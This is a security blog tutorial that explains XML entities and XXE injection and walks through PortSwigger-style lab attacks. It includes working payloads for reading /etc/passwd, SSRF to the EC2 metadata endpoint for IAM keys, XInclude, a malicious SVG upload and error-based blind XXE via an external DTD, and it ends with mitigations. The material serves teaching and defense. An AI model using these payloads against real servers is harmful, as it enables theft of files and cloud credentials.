XXE Simplified: The concept, Attacks and Mitigations

Whenever I scroll through HackerOne reports, XXE remains among the vulnerabilities with a critical severity score. Why? Being able to read a server’s sensitive files is often all it takes to fully compromise the victim. Whatever security measures are in place, they fail if there’s a hole in the pot. XXE is exactly the kind of vulnerability that can do severe harm to an organization.

Hey everyone! This blog post covers the basic elements of XML and why XXE arises in the first place. In the latter part, I will cover various attack scenarios around XXE. Finally, we’ll look at the mitigations.

To exfiltrate data with XXE, follow this post.

The basics of XML

XML is a markup language that, like JSON, can be used for storing and transporting data. It represents data in a tree-like structure.

XML entities

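Entities are a way of representing a piece of data in XML by name: an entity is declared once, and every reference to it is replaced with its value when the document is parsed.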

Document type definition [DTD]

A DTD defines the structure of an XML document along with its legal elements and attributes. As I said, XML can be used for transporting data, so the sender and the receiver need a common standard for what a document should look like. A DTD provides that standard and is used to check the validity of an XML document. DTDs can be internal (declared inside the document) or external (loaded from a separate file).

Internal DTD with elements

<?xml version="1.0"?>
<!DOCTYPE todo [
<!ELEMENT todo (name)>
<!ELEMENT name (#PCDATA)>
]>
<todo>
<name>Go to gym</name>
</todo>

The example defines a DOCTYPE named todo: the root element todo must contain exactly one name element, and name holds text. That’s the format we have defined, and the XML document is expected to follow it.

Elements are the actual markup tags defined by the DTD, just like HTML’s <p> or <h1>.

<name></name> is a user-defined element.

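If you are wondering what #PCDATA is: it stands for parsed character data, i.e. text that the parser processes, expanding any entity references it contains. That is exactly why entities matter in the rest of this post.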

Internal DTD with entities

<!DOCTYPE foobar [ <!ENTITY test "Test123" > ]>

This is a DTD with an entity named test whose value is “Test123”. The entity can now be referenced in the XML document by writing & followed by its name and a semicolon. For example:

<lol>&test;</lol>

Whenever the XML document is parsed, &test; is replaced with Test123.
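As a quick check of this behaviour, here is a minimal Python sketch using the standard library’s xml.etree.ElementTree, which expands internal entities declared in the DOCTYPE. It simply combines the two snippets above into one document; the variable names are only for illustration.

```python
import xml.etree.ElementTree as ET

# The DTD and the element from the snippets above, combined into one document.
document = (
    '<!DOCTYPE foobar [ <!ENTITY test "Test123" > ]>'
    '<lol>&test;</lol>'
)

root = ET.fromstring(document)

# By the time we see the tree, the parser has already replaced &test;
# with the entity's value.
print(root.tag, root.text)
```

The application code never sees &test; at all, only the expanded value. That is what makes entities interesting from an attacker’s point of view.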

Parameter Entities

Parameter entities behave like general entities and are declared almost exactly the same way. However, they use a % instead of an &, and they can only be used inside a DTD, while general entities are used in the document content.

Syntax

<!ENTITY % name   "foobar">

Dereferencing

<!ELEMENT employee (%name;)>

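Parameter entities are useful when entities have to be nested inside the DOCTYPE. Keep in mind that a reference placed inside another declaration, as in the example above, is only permitted in an external DTD; in the internal subset, parameter entity references may only appear between declarations. Parameter entities are used heavily to exploit blind XXE with out-of-band interaction. We’ll see the usage in detail in the follow-up post.

That covers the fundamentals. Now comes the attack: XXE.

So let’s understand what XXE is and how it happens.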

What is XXE

XXE (XML External Entity) injection is a vulnerability that allows an adversary to interfere with an application’s parsing of XML data. With a successful XXE attack, an attacker can view sensitive files on the server, such as /etc/passwd.

Wondering how? Let’s take an example.

<!DOCTYPE foo [ <!ENTITY malxxe SYSTEM "file:///path/to/file" > ]>

The entity malxxe is declared with the SYSTEM keyword, which means its value is loaded from a system identifier. A system identifier is nothing but a URI (Uniform Resource Identifier), and file:///path/to/file is one such URI. When &malxxe; is referenced in any element, the parser substitutes the contents of the file, and they show up wherever the application reflects that element.

XXE can also be chained with other attacks such as SSRF to further increase the impact of a compromise.

XXE attacks arise when XML parsers are poorly configured.

Several risk factors, taken together, open the door to XXE:

  • The application parses XML documents.
  • Tainted (attacker-controlled) data is allowed in the SYSTEM identifier within the DTD.
  • The XML processor is configured to validate and process the DTD.
  • The XML processor is configured to resolve external entities within the DTD.
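Whether the last two conditions hold depends entirely on the parser and how it is configured. As a hedged illustration, Python’s standard xml.etree.ElementTree does not resolve external entities and, according to the Python documentation, raises a ParseError when it meets one. The sketch below feeds it a document built around the malxxe entity from above; the helper name external_entity_is_rejected is made up for this example.

```python
import xml.etree.ElementTree as ET

# The malxxe declaration from above, referenced from a root element.
payload = (
    '<!DOCTYPE foo [ <!ENTITY malxxe SYSTEM "file:///path/to/file" > ]>'
    '<foo>&malxxe;</foo>'
)

def external_entity_is_rejected(xml_text):
    """Return True if the parser refuses the document, False if it parses."""
    try:
        ET.fromstring(xml_text)
    except ET.ParseError:
        return True
    return False

print(external_entity_is_rejected(payload))
print(external_entity_is_rejected("<foo>plain text</foo>"))
```

A parser that behaves like this removes the fourth risk factor. Parsers that do fetch the URI behind a SYSTEM identifier are the ones the attacks below rely on.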

Attacks

I showed a basic DTD snippet that can lead to XXE. Let’s see it in action. I’ll be referencing various labs from PortSwigger to explain the different XXE scenarios.

XXE using external entities

There is an application that uses XML data in the request to check stock.

Body of original request

<stockcheck>
<productId>1234</productId>
<storeId>1</storeId>
</stockcheck>

If the XML parser is weakly configured, an external entity can be declared and then referenced inside the tags that were part of the original request. Since the parser processes the document and the application reflects the result in the response, referencing a malicious entity can retrieve sensitive files.

Let’s see how.

A DOCTYPE is added to the request that declares an entity xxe with the URI file:///etc/passwd. Referencing it as &xxe; in <productId> reflects the contents of /etc/passwd in the response.

Check out another example in Aragog from Hack The Box, where the file read obtained through XXE leads to the initial foothold on the box.
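Since the original request body and the element names are known, the modified body can be sketched in a few lines of Python. This is only an illustration of how the payload is put together: the function name build_xxe_body is invented, and the DOCTYPE name foo is an arbitrary choice.

```python
def build_xxe_body(uri, entity="xxe", store_id="1"):
    """Build a stock-check body whose <productId> references an external entity.

    The element names come from the original request shown above; the
    function itself is a hypothetical helper.
    """
    return (
        '<?xml version="1.0" encoding="UTF-8"?>\n'
        # Declare the external entity in an internal DTD subset.
        f'<!DOCTYPE foo [ <!ENTITY {entity} SYSTEM "{uri}"> ]>\n'
        '<stockcheck>\n'
        # Reference the entity where the product ID used to be.
        f'<productId>&{entity};</productId>\n'
        f'<storeId>{store_id}</storeId>\n'
        '</stockcheck>'
    )

print(build_xxe_body("file:///etc/passwd"))
```

The productId value is a natural place for the reference when the application echoes an invalid product ID back in its response.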

XXE to perform SSRF

If an application is vulnerable to XXE, it can further be used to query the internal network (not reachable from the internet, but reachable from the vulnerable application) for sensitive information.

Ex: There is a simulated EC2 metadata endpoint at the URL http://169.254.169.254/

The application vulnerable to XXE can query this endpoint. The task is to read the server’s IAM secret access key.

Notice that only the URL in the SYSTEM identifier changes; the rest of the entity definition remains the same. The URL has to be constructed step by step: request a path, look at the entries listed in the response, and append the next one after the slash (/). Refer to the AWS documentation for insight into the keywords used.
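The step-by-step construction can be sketched as follows. The path segments follow the layout described in the AWS instance metadata documentation. ROLE-NAME is a placeholder for whatever role name the previous response lists, and the helper names are invented for this sketch.

```python
BASE = "http://169.254.169.254/"

# Path segments discovered one response at a time. ROLE-NAME is a placeholder,
# not a real value.
SEGMENTS = ["latest", "meta-data", "iam", "security-credentials", "ROLE-NAME"]

def path_prefixes(segments):
    """Return the URL to request at each step, starting from the bare endpoint."""
    return [BASE + "/".join(segments[:i]) for i in range(len(segments) + 1)]

def ssrf_body(url):
    """Same stock-check payload as for file reads; only the SYSTEM URI differs."""
    return (
        '<?xml version="1.0" encoding="UTF-8"?>\n'
        f'<!DOCTYPE foo [ <!ENTITY xxe SYSTEM "{url}"> ]>\n'
        '<stockcheck><productId>&xxe;</productId><storeId>1</storeId></stockcheck>'
    )

for url in path_prefixes(SEGMENTS):
    print(url)
```

Each URL would be sent in its own request via ssrf_body(url), and the listing in the response tells you which segment to append next.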

Exploiting Xinclude to retrieve files

Some applications receive client-submitted data, embed it on the server side into an XML document, and then parse the document. An example of this occurs when client-submitted data is placed into a back-end SOAP request, which is then processed by the back-end SOAP service. In this scenario, you can’t define a DOCTYPE, because you don’t control the XML document as a whole.

Here XInclude comes to the rescue. XInclude is a W3C specification from the XML family that allows an XML document to be built from sub-documents. An XInclude element can be placed within any data value in an XML document.

To perform an XInclude attack, you need to reference the XInclude namespace and provide the path to the file that you wish to include. For example:

<foo xmlns:xi="http://www.w3.org/2001/XInclude"><xi:include parse="text" href="file:///etc/passwd"/></foo>
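To see what an XInclude-aware processor does with that element, here is a minimal Python sketch using the standard library’s xml.etree.ElementInclude. It assumes a stub loader (stub_loader, a name invented here) that returns a marker string instead of touching the file system. It therefore only illustrates the substitution step, not a real attack or the behaviour of any particular server.

```python
import xml.etree.ElementTree as ET
from xml.etree import ElementInclude

document = (
    '<foo xmlns:xi="http://www.w3.org/2001/XInclude">'
    '<xi:include parse="text" href="file:///etc/passwd"/>'
    '</foo>'
)

def stub_loader(href, parse, encoding=None):
    """Stand-in for a real loader: report what would be read, read nothing."""
    return f"[contents of {href}]"

root = ET.fromstring(document)

# Expand xi:include elements in place. With parse="text" the loader's return
# value is inserted as plain text where the include element used to be.
ElementInclude.include(root, loader=stub_loader)

print(ET.tostring(root, encoding="unicode"))
```

After expansion the include element is gone and its place is taken by text. With a real loader that text would be the file’s contents, which is why the attack works without any DOCTYPE.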

XXE via file upload

This use case is one of my favourites. I was amazed by the attack possibilities that file uploads offer.

Here, the application uses the Apache Batik library to process avatar image files. The catch is that even if the upload is meant for formats like PNG or JPEG, the image library may also support SVG. And SVG is XML. So an attacker can submit a malicious SVG image and have sensitive content rendered inside the processed image.

xxe.svg file

<?xml version="1.0" standalone="yes"?><!DOCTYPE test [ <!ENTITY xxe SYSTEM "file:///etc/hostname" > ]><svg width="128px" height="128px" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" version="1.1"><text font-size="16" x="0" y="16">&xxe;</text></svg>

XXE via modified content type

By default, POST requests generated by HTML forms use the content type application/x-www-form-urlencoded. Some websites expect requests in this format but will also tolerate other content types, including XML.

Normal Request

POST /action HTTP/1.0
Content-Type: application/x-www-form-urlencoded
Content-Length: 7

foo=bar

With XML

POST /action HTTP/1.0
Content-Type: text/xml
Content-Length: 52

<?xml version="1.0" encoding="UTF-8"?><foo>bar</foo>

If the application accepts the request with the XML content type and parses the body as XML, then simply reformatting the request gives an attacker a way to reach the XXE attack surface.
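The reformatting step between the two requests above can be sketched in Python. The helper form_to_xml is a made-up name and handles only the single-field case from the example.

```python
from urllib.parse import parse_qsl
from xml.sax.saxutils import escape

def form_to_xml(form_body):
    """Turn a single 'name=value' form body into '<name>value</name>'."""
    pairs = parse_qsl(form_body)
    if len(pairs) != 1:
        raise ValueError("this sketch handles exactly one form field")
    name, value = pairs[0]
    # Escape the value so characters like < or & keep the XML well-formed.
    return f'<?xml version="1.0" encoding="UTF-8"?><{name}>{escape(value)}</{name}>'

xml_body = form_to_xml("foo=bar")

# Headers that change along with the body.
headers = {
    "Content-Type": "text/xml",
    "Content-Length": str(len(xml_body.encode("utf-8"))),
}

print(headers)
print(xml_body)
```

If the server responds to this request the same way as to the form-encoded one, the body is probably being parsed as XML, and the DOCTYPE-based payloads from the earlier sections are worth trying.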

Blind XXE

When a request carries data in XML format but none of it is reflected in the response, it gets difficult to tell whether the application is vulnerable to XXE or not. And with no data reflected in the response, data retrieval becomes difficult too. In such scenarios, OAST (out-of-band application security testing) techniques are used. That is yet another topic to discuss. You can find the post here.

Within the scope of this post, I will talk about a workaround that makes it possible to get data reflected even when exploiting blind XXE.

Blind XXE to retrieve data via error messages

The trick here is to trigger an XML parsing error and load sensitive data as part of the error message. This only works if the application returns the parser’s error message in the response.

Here we create an external DTD that, when imported, reads the contents of /etc/passwd into the file entity and then tries to use that value as part of a file path.

<!ENTITY % file SYSTEM "file:///etc/passwd">
<!ENTITY % eval "<!ENTITY &#x25; error SYSTEM 'file:///invalid/%file;'>">
%eval;
%error;

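This DTD is stored on Burp’s exploit server. You can use your own server too.

Notice where %xxe; is referenced in the request: inside the DOCTYPE itself, so the external DTD is fetched and processed as soon as the document is parsed. The DTD then tries to load a file whose path contains the contents of /etc/passwd. That path doesn’t exist, so the parser throws an error, and the error message carries the sensitive data along with it.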
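Put together, the two pieces of this attack can be sketched in Python as plain string builders. The DTD URL is a placeholder for wherever you host the file, the function names are invented, and the stock-check body is reused from the earlier example as an assumption about the target request.

```python
def error_dtd(target="file:///etc/passwd"):
    """External DTD: read the target into %file;, then use it in a bogus path."""
    return (
        f'<!ENTITY % file SYSTEM "{target}">\n'
        # &#x25; is the character reference for %, needed because the nested
        # declaration sits inside an entity value.
        '<!ENTITY % eval "<!ENTITY &#x25; error SYSTEM \'file:///invalid/%file;\'>">\n'
        '%eval;\n'    # defines the error entity
        '%error;'     # dereferences it, which triggers the failing file lookup
    )

def trigger_body(dtd_url):
    """Request body that pulls in the external DTD through a parameter entity."""
    return (
        '<?xml version="1.0" encoding="UTF-8"?>\n'
        f'<!DOCTYPE foo [ <!ENTITY % xxe SYSTEM "{dtd_url}"> %xxe; ]>\n'
        '<stockcheck><productId>1</productId><storeId>1</storeId></stockcheck>'
    )

# Placeholder URL, not a real host.
print(trigger_body("https://exploit-server.example/exploit.dtd"))
print(error_dtd())
```

Note that the last reference in the DTD has to match the entity declared inside eval, which is error here.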

Mitigations

No doubt XXE is a critical vulnerability to have in your application, but it can be prevented to a certain extent when the correct measures are taken.

  • Disable DTD processing and external entity resolution in the XML parser.
  • Keep XML processors and libraries patched.
  • Validate user input before parsing.
  • Validate and sanitise URLs to prevent SSRF.
  • Use less complex data formats such as JSON.
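As a rough sketch of the first bullet, here is one way to refuse any document that carries a DTD, using only Python’s standard library. The names DTDForbidden and parse_untrusted are invented for this example. In a real application, the parser’s own configuration switches or a maintained hardening library such as defusedxml would be a better choice than hand-rolled checks.

```python
import xml.etree.ElementTree as ET
from xml.parsers import expat

class DTDForbidden(ValueError):
    """Raised when a document contains a DOCTYPE declaration."""

def _reject_doctype(name, system_id, public_id, has_internal_subset):
    # expat calls this handler as soon as it sees <!DOCTYPE ...>.
    raise DTDForbidden(f"DOCTYPE {name!r} is not allowed")

def parse_untrusted(xml_text):
    """Parse XML only if it carries no DTD at all (hypothetical helper)."""
    checker = expat.ParserCreate()
    checker.StartDoctypeDeclHandler = _reject_doctype
    checker.Parse(xml_text, True)  # raises DTDForbidden on any DOCTYPE
    return ET.fromstring(xml_text)

root = parse_untrusted("<stockcheck><productId>1234</productId></stockcheck>")
print(root.find("productId").text)

try:
    parse_untrusted(
        '<!DOCTYPE foo [ <!ENTITY xxe SYSTEM "file:///etc/passwd"> ]>'
        '<foo>&xxe;</foo>'
    )
except DTDForbidden as exc:
    print("rejected:", exc)
```

Rejecting the DOCTYPE outright is stricter than only disabling external entities, but most request bodies (like the stock check above) never need a DTD in the first place.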

That’s all for this blog post! See you in the next one!

Until then, Happy hunting! 🙂

shreyapohekar

I am Shreya Pohekar. I love to build and break stuff. Currently, I'm working as iOS and angular developer. I am also a contributor to CodeVigilant project. My blogs are focused on Infosec and Dev and its how to's.
